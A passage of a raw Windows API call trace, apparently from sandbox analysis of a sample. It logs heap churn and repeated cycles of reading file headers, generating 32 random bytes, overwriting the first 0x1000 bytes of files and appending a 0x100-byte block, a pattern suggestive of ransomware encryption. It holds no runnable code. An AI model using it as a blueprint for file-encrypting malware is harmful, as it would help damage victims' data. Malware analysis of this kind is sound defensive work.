0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.676] GetProcessHeap () returned 0x280000 [0076.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.677] GetProcessHeap () returned 0x280000 [0076.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.677] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.678] GetProcessHeap () returned 0x280000 [0076.678] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.679] GetProcessHeap () returned 0x280000 [0076.679] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.680] SetFilePointerEx (in: hFile=0x7f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.680] WriteFile (in: hFile=0x7f4, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.680] WriteFile (in: hFile=0x7f4, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.680] GetProcessHeap () returned 0x280000 [0076.680] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.680] CloseHandle (hObject=0x7f4) returned 1 [0076.681] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 29 [0076.681] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.681] ReadFile (in: hFile=0x7f8, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.681] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.681] GetProcessHeap () returned 0x280000 [0076.681] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.681] GetProcessHeap () returned 0x280000 [0076.681] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.681] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.682] GetProcessHeap () returned 0x280000 [0076.682] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.682] ReadFile (in: hFile=0x7f8, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.732] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.732] WriteFile (in: hFile=0x7f8, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.732] GetProcessHeap () returned 0x280000 [0076.732] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.732] GetProcessHeap () returned 0x280000 [0076.732] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.732] GetProcessHeap () returned 0x280000 [0076.733] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.733] GetProcessHeap () returned 0x280000 [0076.733] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.734] GetProcessHeap () returned 0x280000 [0076.734] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.735] GetProcessHeap () returned 0x280000 [0076.735] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.736] GetProcessHeap () returned 0x280000 [0076.736] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.770] GetProcessHeap () returned 0x280000 [0076.770] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.770] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.771] SetFilePointerEx (in: hFile=0x7f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.771] WriteFile (in: hFile=0x7f8, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.771] WriteFile (in: hFile=0x7f8, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.771] GetProcessHeap () returned 0x280000 [0076.771] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.771] CloseHandle (hObject=0x7f8) returned 1 [0076.772] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 30 [0076.772] SetFilePointerEx (in: hFile=0x7fc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.772] ReadFile (in: hFile=0x7fc, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.772] SetFilePointerEx (in: hFile=0x7fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.773] GetProcessHeap () returned 0x280000 [0076.773] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.773] GetProcessHeap () returned 0x280000 [0076.773] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.773] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.773] GetProcessHeap () returned 0x280000 [0076.773] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.773] ReadFile (in: hFile=0x7fc, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.821] SetFilePointerEx (in: hFile=0x7fc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.821] WriteFile (in: hFile=0x7fc, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: 